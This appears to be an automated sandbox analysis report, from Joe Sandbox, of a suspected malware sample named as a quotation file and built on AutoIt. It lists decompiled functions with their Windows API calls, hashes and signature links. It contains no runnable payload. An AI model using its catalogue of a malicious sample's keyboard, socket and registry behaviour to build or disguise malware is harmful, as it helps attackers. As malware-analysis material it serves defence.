                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                                                                      • Instruction ID: 89bb8b51d6ed9bc3dcf84661b76e2201dfab7d9e8893de6b472f92bd877d042b
                                                                      • Opcode Fuzzy Hash: 7a37ddd72d2ef895ad7b7b0f47a4bc2ee7463f99e252cfba6409eb2ff47999dc
                                                                      • Instruction Fuzzy Hash: 6D5101A06847D53DFB3342349C15BBBBEE95B06388F0C95C9E1D8A68D2C298ECC8D751
                                                                      Function 00E60D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00E60DA5
                                                                      • GetKeyboardState.USER32(?), ref: 00E60DBA
                                                                      • SetKeyboardState.USER32(?), ref: 00E60E1B
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E60E47
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E60E64
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E60EA8
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E60EC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                                                                      • Instruction ID: 7f246ffb3806a628be65657dce02c3648e8cdb0ae7c54871bf1a3a4361b6b7bb
                                                                      • Opcode Fuzzy Hash: b093929a1bb2346777af6b7c2fd43ba45be4dd93a4525cc4b9849bea96d6f47a
                                                                      • Instruction Fuzzy Hash: 0B5138A06847F53EFB3283349C55B7B7FA95B06344F0C9988F1D4664C2C395AC88E350
                                                                      Function 00E655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 2945705084-0
                                                                      • Opcode ID: 57b1e07d7fb8c6222ab8636b775b7a64c4d59b1cb7d2a0ebd4722570cdfad47e
                                                                      • Instruction ID: b197625a0a9c99d19e150f49c35470ebaa3860d8057a8f852e44b40ee777eeea
                                                                      • Opcode Fuzzy Hash: 57b1e07d7fb8c6222ab8636b775b7a64c4d59b1cb7d2a0ebd4722570cdfad47e
                                                                      • Instruction Fuzzy Hash: F241D866D5022876CB11EBB4EC469CFB7F89F04310F50645AF609F3121FB34A285C7AA
                                                                      Function 00E5D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5D60A
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5D61B
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E5D69D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: ,,$DllGetClassObject
                                                                      • API String ID: 753597075-2867008933
                                                                      • Opcode ID: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                                                                      • Instruction ID: 3de353cdb548cbaa85371de3cdae1374348c5485426a62a57b7fdf8bbe998c26
                                                                      • Opcode Fuzzy Hash: ee79ca4ba313095c8ae1c317a88c2c889131caa3c92243035139ddfdc1fee35e
                                                                      • Instruction Fuzzy Hash: C441AFB1604204EFDF24DF14CC84A9A7BA9EF44315F1594ADED09EF205D7B0D949CBA0
                                                                      Function 00E63671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E636B7
                                                                      • _wcscmp.LIBCMT ref: 00E636D3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E636EB
                                                                      • _wcscat.LIBCMT ref: 00E63733
                                                                      • SHFileOperationW.SHELL32(?), ref: 00E6379F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 1377345388-1173974218
                                                                      • Opcode ID: e990ea48047c78cacd9ca9ccce73141e9528419bd445024ca8f6cc68344b2285
                                                                      • Instruction ID: 481ba4f520aa933baa4ffefdfb098f68b439609fe2ba6dcc63774aa58c6970b4
                                                                      • Opcode Fuzzy Hash: e990ea48047c78cacd9ca9ccce73141e9528419bd445024ca8f6cc68344b2285
                                                                      • Instruction Fuzzy Hash: B74183B1548344AEC751EF74E4419DF77E8EF89384F00282EF499E32A1EA34D689C756
                                                                      Function 00E87291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E872AA
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87351
                                                                      • IsMenu.USER32(?), ref: 00E87369
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E873B1
                                                                      • DrawMenuBar.USER32 ref: 00E873C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      • Opcode ID: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
                                                                      • Instruction ID: 6392baf952ab528ed3461b8a796deb656bba78f470282d489a7cdf6d70d48c12
                                                                      • Opcode Fuzzy Hash: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
                                                                      • Instruction Fuzzy Hash: 40412675A04208AFDB20EF50D884E9ABBF8FB04314F24A529FD99A7260D731ED54EB51
                                                                      Function 00E80FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E80FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E80FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E810B5
                                                                        • Part of subcall function 00E80FA5: RegCloseKey.ADVAPI32(?), ref: 00E8101B
                                                                        • Part of subcall function 00E80FA5: FreeLibrary.KERNEL32(?), ref: 00E8106D
                                                                        • Part of subcall function 00E80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E81090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E81058
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
                                                                      • Instruction ID: d346e3bf18a8a4451b2024f8927e53f793484d2b0a2069af09f9d971c3adb1ec
                                                                      • Opcode Fuzzy Hash: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
                                                                      • Instruction Fuzzy Hash: 98311C71901109BFDB15AB90DC89AFFB7BCEF08304F1001A9E509F2141EA749E8A9BA0
                                                                      Function 00E862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E862EC
                                                                      • GetWindowLongW.USER32(01014DD0,000000F0), ref: 00E8631F
                                                                      • GetWindowLongW.USER32(01014DD0,000000F0), ref: 00E86354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E86386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E863B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E863C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E863DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                                                                      • Instruction ID: a95cfacd970d2082239a09760f0c4252a35013321eec75828c038b7ca539ce4a
                                                                      • Opcode Fuzzy Hash: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                                                                      • Instruction Fuzzy Hash: 353134326002509FDB21DF1ADC84F5537E1FB8A718F1811B4F508EF2B1CB72A8849B90
                                                                      Function 00E5DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E5DB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 00E5DB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 2f4413d8e0e00343a14bede3feedfee4738b61c8084280fe47d745fbf5aa6f80
                                                                      • Instruction ID: de8b6b66b3aab4dd3b1332be475bac2ef7be4b3276d2c405b5900da85937ed33
                                                                      • Opcode Fuzzy Hash: 2f4413d8e0e00343a14bede3feedfee4738b61c8084280fe47d745fbf5aa6f80
                                                                      • Instruction Fuzzy Hash: DF21C736604219AFDF60DFA9DC88CBB73EDEB08365B118525FD18EB251D670DC498760
                                                                      Function 00E76173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E761C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E761D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E7620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00E76217
                                                                      • WSAGetLastError.WSOCK32 ref: 00E76221
                                                                      • closesocket.WSOCK32(00000000), ref: 00E7624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76263
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      • Opcode ID: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
                                                                      • Instruction ID: 87399a7529aad41b02455b011a2c66d56cdfd573726c95984b0413720575a0f7
                                                                      • Opcode Fuzzy Hash: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
                                                                      • Instruction Fuzzy Hash: 6E31A471600514AFDF14AF64CC85BBD7BA8EB45718F048069FD09B7292DB70AC449B61
                                                                      Function 00E5F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: 88a9f87bc911077821e51ec83e0cd1d818c3ef10fd06cfbc99f04bc3e701b57b
                                                                      • Instruction ID: afa117517d7cd74d9ad686d3df20a6f8088fa220eac7d0cc7846153370878736
                                                                      • Opcode Fuzzy Hash: 88a9f87bc911077821e51ec83e0cd1d818c3ef10fd06cfbc99f04bc3e701b57b
                                                                      • Instruction Fuzzy Hash: C12149722142217ADA20AA34AC02FE773DCEF59345F10683AFD46B7091EB909D89C2D5
                                                                      Function 00E5DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E5DC32
                                                                      • SysAllocString.OLEAUT32 ref: 00E5DC53
                                                                      • SysFreeString.OLEAUT32 ref: 00E5DC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DC84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 2398062d546208c73049feb666d8b4efc24097866918341107e30270c7083340
                                                                      • Instruction ID: 2912299aec77b4c6d25d6bc6d225956202435b8d11e1594f77dba32f7c887198
                                                                      • Opcode Fuzzy Hash: 2398062d546208c73049feb666d8b4efc24097866918341107e30270c7083340
                                                                      • Instruction Fuzzy Hash: 48219835608204AFDB20DFB9DC88DABB7ECEB08361B118565FD15EB2A1D670DC49C764
                                                                      Function 00E875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E8763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E87659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87665
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
                                                                      • Instruction ID: 4b92f18f54b796829f237464315f4e6d2404235e7469566e9401c89265a46430
                                                                      • Opcode Fuzzy Hash: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
                                                                      • Instruction Fuzzy Hash: 5211D3B2110219BFEF109F64CC85EE77F5DEF08398F115115B648B20A0D6729C21DBA4
                                                                      Function 00E29AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00E29AE6
                                                                        • Part of subcall function 00E23187: EncodePointer.KERNEL32(00000000), ref: 00E2318A
                                                                        • Part of subcall function 00E23187: __initp_misc_winsig.LIBCMT ref: 00E231A5
                                                                        • Part of subcall function 00E23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E29EA0
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E29EB4
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E29EC7
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E29EDA
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E29EED
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E29F00
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E29F13
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E29F26
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E29F39
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E29F4C
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E29F5F
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E29F72
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E29F85
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E29F98
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E29FAB
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E29FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00E29AEB
                                                                      • __mtterm.LIBCMT ref: 00E29AF4
                                                                        • Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C56
                                                                        • Part of subcall function 00E29B5C: _free.LIBCMT ref: 00E29C5D
                                                                        • Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(02,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C7F
